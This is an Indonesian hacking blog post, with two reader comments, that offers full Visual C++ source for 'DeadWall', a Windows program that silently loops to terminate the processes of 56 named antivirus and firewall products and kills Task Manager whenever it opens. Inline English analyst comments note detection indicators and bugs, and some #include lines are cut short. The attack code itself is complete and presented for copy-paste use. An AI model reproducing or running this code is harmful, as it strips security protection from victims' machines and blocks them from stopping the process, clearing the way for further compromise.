
Jebol Dan Matikan FireWall

by LOLids artich | | | 2 komentar »



Kali ini saya mau tulis sedikit mengenai membunuh Firewall dengan VC++ (Ver 6). File program ini dibagi menjadi 3 bagian, yaitu DeadWall.cpp, StdAfx.cpp dan StdAfx.h (header); sebelumnya saya jelaskan singkat mengenai prosedurnya.

Disini ada semua nama-nama file thread dari semua Firewall dan Antivirus terkenal, saya masukan dalam array sebanyak 58 (bisa anda modif kalau ada thread Firewall baru)

Untuk membunuh Firewall atau Antivirus tidak bisa langsung dibunuh begitu saja dengan menghapus master filenya, akan tetapi harus mematikan thread prosesnya terlebih dahulu, untuk itu disini dibuat 2 proses yaitu Bunuh_Firewall_NT dan Bunuh_Firewall_98, Bunuh_Firewall_NT juga berlaku untuk 2000 dan XP.

Dengan sedikit modifikasi, program ini juga bisa mematikan Trojan aktif.

Compile dengan VC++ 6 dengan mode 32 bit..
E-Mail atau PM untuk Modify & Pertanyaan..

Selamat menikmati..

Copy Paste text berikut dan save dalam StdAfx.cpp


/*************************/
#include "stdafx.h"
/*************************/

Ini dalam StdAfx.h
/*************************/
#if !defined(AFX_STDAFX_H__A9DB83DB_A9FD_11D0_BFD1_444553540000__INCLUDED_)
#define AFX_STDAFX_H__A9DB83DB_A9FD_11D0_BFD1_444553540000__INCLUDED_
#if _MSC_VER > 1000
#pragma once
#endif // _MSC_VER > 1000
#define WIN32_LEAN_AND_MEAN
#include
#endif
/*************************/

Dan ini master programnya dalam DeadWall.cpp
/*************************/
/* Copyright (c) DeathBrain 2002 */
/* Hormati Lisensi */
/* E-Mail atau PM untuk modifikasi thx */

#include "stdafx.h"
#include

/*
 * Kode_Firewall: table of upper-case name fragments for antivirus and
 * personal-firewall processes. Both scanning routines in this file compare
 * running process names against these fragments with strstr().
 *
 * The array is declared with 58 slots but only 56 initializers are listed,
 * so the last two entries are NULL; the scanning loops stop at index 56.
 *
 * Analyst note: the strings are stored verbatim, so this cluster of
 * security-product names inside one binary is a practical static indicator
 * (plain string / signature match) for a tool of this kind.
 */
char *Kode_Firewall[58]={
"ANTIVIR","WEBSCANX","SAFEWEB","ICMON",
"CFINET","CFINET32","AVP.EXE","LOCKDOWN2000",
"AVP32","ZONEALARM","ALERTSVC","AMON.EXE",
"AVPCC.EXE","AVPM.EXE","ESAFE.EXE","PCCIOMON",
"PCCMAIN","POP3TRAP","WEBTRAP","AVCONSOL",
"AVSYNMGR","VSHWIN32","VSSTAT","NAVAPW32",
"NAVW32","NMAIN","LUALL","LUCOMSERVER",
"IAMAPP","ATRACK","MCAFEE","FRW.EXE","IAMSERV.EXE",
"NSCHED32","PCFWALLICON","SCAN32","TDS2-98",
"TDS2-NT","VETTRAY","VSECOMR","NISSERV",
"RESCUE32","SYMPROXYSVC","NISUM","NAVAPSVC",
"NAVLU32","NAVRUNR","NAVWNT","PVIEW95",
"F-STOPW","F-PROT95","PCCWIN98","IOMON98",
"FP-WIN","NVC95","NORTON",};

/* Forward declarations. "Bunuh" is Indonesian for "kill". */
/* Process scan that enumerates through PSAPI.DLL (used when GetVersion() has the high bit clear). */
void Bunuh_Firewall_NT();
/* Process scan that enumerates through a Toolhelp32 snapshot (used when GetVersion() has the high bit set). */
void Bunuh_Firewall_98();

/* Worker thread entry point; its LPVOID argument is unnamed and unused. */
DWORD WINAPI Bunuh_Proses_Thread( LPVOID );
/*
 * Program entry point. Starts Bunuh_Proses_Thread on a new thread and then
 * blocks on it. No window is created and none of the WinMain parameters are
 * used, so while the worker runs the program shows no user interface.
 *
 * Returns 0.
 */
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)

{
DWORD t;
// The CreateThread result is not checked; a NULL handle makes the wait below fail at once.
HANDLE hAV = CreateThread( NULL, 0, Bunuh_Proses_Thread, 0, 0, &t);
// The worker loops on while(TRUE), so this wait only returns if the thread could not be created or is ended from outside.
WaitForSingleObject( hAV, INFINITE);

// Placeholder message box ("e" text, "d" caption); reached only when the wait above returns.
MessageBox(0,"e","d",MB_OK);return 0;}

/*
 * Worker loop. Once per second it runs the platform-specific process scan
 * and then looks for an open Task Manager window and terminates the process
 * that owns it.
 *
 * The loop has no exit condition, so the trailing `return 0` is not reached
 * in normal execution.
 *
 * Analyst note: the observable symptoms are security tools exiting shortly
 * after start and Task Manager closing within about a second of being
 * opened, repeated for as long as this process is alive.
 */
DWORD WINAPI Bunuh_Proses_Thread( LPVOID )
{DWORD pd;
while(TRUE){
// Fixed 1000 ms polling interval between scans.
Sleep(1000);
// GetVersion() sets the high-order bit on the Windows 95/98/Me family, which makes the (int) cast negative.
if((int)GetVersion() < 0 ) Bunuh_Firewall_98();else Bunuh_Firewall_NT();
// "#32770" is the standard dialog window class; the title match is exact and English-only.
HWND hw=FindWindow("#32770","Windows Task Manager");
if(hw!=NULL){
// Resolve the window to its owning process id (written to pd).
GetWindowThreadProcessId(hw,&pd);
// The OpenProcess result is used unchecked and never closed, so a handle is leaked every time the window is found.
TerminateProcess(OpenProcess(PROCESS_ALL_ACCESS,FALSE,pd ),0);}}
return 0;}

/*
 * Process scan for the NT family (the accompanying article says it also
 * applies to Windows 2000 and XP). Enumerates running processes through
 * PSAPI.DLL, reads the file name of each process's first module, and
 * terminates the process when that name contains any populated
 * Kode_Firewall fragment.
 *
 * Takes no arguments and returns nothing; every failure path returns
 * silently.
 *
 * Analyst notes:
 *  - The PSAPI functions are resolved at run time with GetProcAddress, so
 *    they do not appear in the import table; the names "EnumProcesses",
 *    "EnumProcessModules" and "GetModuleFileNameExA" are still present as
 *    plain strings.
 *  - Every pass requests PROCESS_ALL_ACCESS on every enumerated PID.
 *    Telemetry that records cross-process handle opens (for example Sysmon
 *    ProcessAccess events) shows this as one process repeatedly requesting
 *    full access to all others.
 *  - On current Windows, security services that run as protected processes
 *    refuse this access request; OpenProcess then returns NULL and the entry
 *    is skipped by the `if (hProcess)` check.
 *  - The match is a substring test on the module file name, so an unrelated
 *    program whose path merely contains one of the fragments is terminated
 *    as well.
 */
void Bunuh_Firewall_NT()
{
HINSTANCE hLib = LoadLibraryA("PSAPI.DLL");
if (!hLib) return ;
// Function pointers for the three PSAPI exports, resolved by name below.
BOOL (WINAPI *Enumerasi_Proses)( DWORD *, DWORD cb, DWORD * );
BOOL (WINAPI *Enumerasi_Modul_Proses)( HANDLE, HMODULE *, DWORD, LPDWORD );
DWORD (WINAPI *Ambil_Modul_Filename)( HANDLE, HMODULE, LPTSTR, DWORD );
Enumerasi_Proses = (BOOL(WINAPI *)(DWORD *,DWORD,DWORD*)) GetProcAddress( hLib, "EnumProcesses" ) ;
Enumerasi_Modul_Proses = (BOOL(WINAPI *)(HANDLE, HMODULE *, DWORD, LPDWORD)) GetProcAddress( hLib, "EnumProcessModules" ) ;
Ambil_Modul_Filename = (DWORD (WINAPI *)(HANDLE, HMODULE, LPTSTR, DWORD )) GetProcAddress( hLib, "GetModuleFileNameExA" ) ;
// Give up, releasing the library, if any export is missing.
if( Enumerasi_Proses == NULL || Enumerasi_Modul_Proses == NULL || Ambil_Modul_Filename == NULL )
{FreeLibrary(hLib);return;}

// Fixed buffer of 500 PIDs; processes beyond that count are not examined.
DWORD *Proses_ID = new DWORD[500];
// This early return does not call FreeLibrary(hLib).
if(Proses_ID==NULL) return;
DWORD dwSize;
if (!Enumerasi_Proses(Proses_ID, 500*sizeof(DWORD), &dwSize))
{delete [] Proses_ID;
FreeLibrary(hLib);return ;}

HANDLE hProcess;
HMODULE hModule;
DWORD dwSize2;
char Nama_File[MAX_PATH];
// nIndex is declared but never used.
int nIndex = 0;
// Convert the returned byte count into a number of PIDs.
dwSize = dwSize / sizeof(DWORD);
for (int i=0; i< (int)dwSize;i++)
{hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, Proses_ID[i]);
if (hProcess)
// Only one HMODULE slot is supplied, so only the first module of the process is read.
{if (Enumerasi_Modul_Proses(hProcess, &hModule, sizeof(hModule), &dwSize2))
{if (Ambil_Modul_Filename(hProcess, hModule, Nama_File, sizeof(Nama_File))){
// Upper-case the name in place so it can be compared with the upper-case table.
CharUpperBuff(Nama_File,strlen(Nama_File));
// Inner index shadows the outer loop's i; 56 is the number of populated table entries.
for(int i=0;i < 56; i++)
if(strstr(Nama_File,Kode_Firewall[i])!=0)
TerminateProcess(hProcess,0);}}}
// Runs for every PID, including those where OpenProcess returned NULL.
CloseHandle(hProcess);}
delete [] Proses_ID;
FreeLibrary(hLib);
}

/*
 * Process scan used when GetVersion() reports the Windows 95/98/Me family.
 * Walks a Toolhelp32 process snapshot and terminates every process whose
 * szExeFile contains one of the populated Kode_Firewall fragments.
 *
 * Takes no arguments and returns nothing; returns silently if the snapshot
 * cannot be created.
 *
 * Review notes:
 *  - Unlike the NT routine, szExeFile is not upper-cased before the
 *    comparison, so the strstr() match here is case-sensitive.
 *  - Handles returned by OpenProcess are never closed; each match leaks one
 *    handle per pass, which shows up as a steadily growing handle count for
 *    this process.
 */
void Bunuh_Firewall_98()
{
HANDLE Prosedur_SnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(Prosedur_SnapShot == INVALID_HANDLE_VALUE)
{return;}
PROCESSENTRY32 Proses_Masuk;
HANDLE pr;
// dwSize must be set before Process32First is called.
Proses_Masuk.dwSize = sizeof(PROCESSENTRY32);
BOOL F = Process32First( Prosedur_SnapShot, &Proses_Masuk );
while (F)
// 56 is the number of populated table entries.
{for(int i=0;i< 56;i++)
if(strstr(Proses_Masuk.szExeFile,Kode_Firewall[i])!=0){
pr=OpenProcess(PROCESS_ALL_ACCESS,FALSE,Proses_Masuk.th32ProcessID );
// pr is not closed after use.
if(pr!=NULL) TerminateProcess(pr,0);}
Proses_Masuk.dwSize = sizeof(PROCESSENTRY32);
F = Process32Next( Prosedur_SnapShot, &Proses_Masuk );}
CloseHandle(Prosedur_SnapShot);
}

/*************************/


Nb: simpan semua code-nya terpisah di Notepad.
Semoga bermanfaat & good luck ;) Jika belum berhasil: "Meng-hack memang engga' semudah pikiran kita", tetap mencoba, dan kalau berhasil jangan disalahgunakan yo... ;)

support: hacking forum.










  1. bisnis online ►► [ reply ] [ Jump to TOP ] ► Sat Sep 05, 05:06:00 pm 2009  

    thanks bro, kodenya langsung di unduh

  2. Anonymous ►► [ reply ] [ Jump to TOP ] ► Sat Nov 12, 08:32:00 am 2011  

    I agree completely!
